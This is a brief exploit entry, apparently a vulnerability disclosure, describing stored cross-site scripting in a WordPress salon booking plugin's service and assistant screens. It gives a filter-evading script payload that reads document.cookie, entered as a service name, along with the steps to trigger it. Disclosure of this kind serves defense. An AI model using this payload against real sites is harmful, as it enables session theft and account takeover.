Share
## https://sploitus.com/exploit?id=WPEX-ID:7A375077-FC70-4389-B109-28FCE3DB2AEF
1. Go to "Salon > Services > Add New Service"
2. For the service name, enter: `<script<script>>alert(document.cookie)</script<script>` and save
3. Go to "Assistants" and edit an assistant
4. Click on "Limit reservations to the following services" to see the XSS